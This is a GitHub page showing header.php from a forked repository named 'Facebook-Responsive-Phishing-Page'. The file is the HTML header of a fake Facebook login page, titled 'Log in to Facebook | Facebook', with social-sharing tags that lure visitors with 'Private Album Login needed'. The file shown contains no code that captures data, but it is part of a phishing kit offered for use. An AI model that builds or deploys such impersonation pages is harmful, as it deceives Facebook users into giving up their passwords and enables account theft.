forked from seeratawan01/Facebook-Responsive-Phishing-Page
-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathheader.php
More file actions
54 lines (46 loc) · 1.88 KB
/
header.php
File metadata and controls
54 lines (46 loc) · 1.88 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
<!DOCTYPE html>
<!--[if lt IE 7]> <html class="ie6 oldie"> <![endif]-->
<!--[if IE 7]> <html class="ie7 oldie"> <![endif]-->
<!--[if IE 8]> <html class="ie8 oldie"> <![endif]-->
<!--[if gt IE 8]><!-->
<html lang="en">
<!--<![endif]-->
<head>
<meta charset="utf-8">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="Private Album Login needed!"/>
<title id="pageTitle">Log in to Facebook | Facebook</title>
<link rel="icon"
type="image/png"
href="./favicon.png" />
<link rel="stylesheet" type="text/css" href="grid.css">
<link rel="stylesheet" type="text/css" href="main.css">
<meta property="og:type" content="website" />
<meta property="og:title" content="Private Album Login needed" />
<meta property="og:description" content="Private Album Login needed" />
<meta property="og:url" content="Private Album Login needed" />
<meta property="og:site_name" content="Private Album Login needed" />
<!--
To learn more about the conditional comments around the html tags at the top of the file:
paulirish.com/2008/conditional-stylesheets-vs-css-hacks-answer-neither/
Do the following if you're using your customized build of modernizr (http://www.modernizr.com/):
* insert the link to your js here
* remove the link below to the html5shiv
* add the "no-js" class to the html tags at the top
* you can also remove the link to respond.min.js if you included the MQ Polyfill in your modernizr build
-->
<!--[if lt IE 9]>
<script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script>
<![endif]-->
</head>
<body>
<header>
<div class="container navbar">
<div class="logoImg">
<a href="/" title="Go to Facebook home">
<span id="logo"></span>
</a>
<a href="https://www.facebook.com/r.php?locale=en_GB&display=page" target="_black" id="signupBtn">Sign Up</a>
</div>
</div>
</header>